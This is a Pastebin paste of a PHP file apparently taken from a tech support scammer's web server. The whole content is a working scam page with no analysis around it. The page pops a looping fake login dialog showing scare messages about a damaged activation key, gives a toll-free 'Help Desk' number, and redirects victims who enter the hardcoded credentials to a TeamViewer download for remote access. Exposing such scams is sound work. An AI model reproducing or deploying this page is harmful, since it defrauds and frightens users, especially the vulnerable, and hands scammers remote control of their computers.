Advertisement
Guest User

Report.php off tech support scammer web server

a guest
Jan 10th, 2018
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.00 KB | None | 0 0
  1.  
  2. session_start();
  3.  
  4. $_user = 'windows2016';
  5. $_password = 'microsoft';
  6.  
  7. if ($_SERVER['PHP_AUTH_USER'] != $_user || $_SERVER['PHP_AUTH_PW'] != $_password ) {
  8.  
  9. if(isset($_SESSION['login_attempts'])){ $_SESSION['login_attempts']++; }else{$_SESSION['login_attempts'] = 3;}
  10.  
  11. if($_SESSION['login_attempts'] == 3){
  12. header('Location: report.php');
  13. exit;
  14. } else {
  15.  
  16. header('WWW-Authenticate: Basic realm="0x80070424 Warning: Activation Key Damaged !!! Call Help Desk: +1-855-442-4430 (TOLL-FREE) "');
  17. header('HTTP/1.0 401 Unauthorized');
  18. $page = $_SERVER['PHP_SELF'];
  19. $sec = "0";
  20. header("Refresh: $sec; url=$page");
  21. echo "<html><head><title>Internet Security Damaged !!! Call Help Desk</title></head><body>";
  22.  
  23.  
  24. exit;
  25. }
  26. } else {
  27.  
  28. header('Location: report.php');
  29. header('Location: http://download.teamviewer.com/download/TeamViewer_Setup_en.exe');
  30.  
  31. exit;
  32. }
  33. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement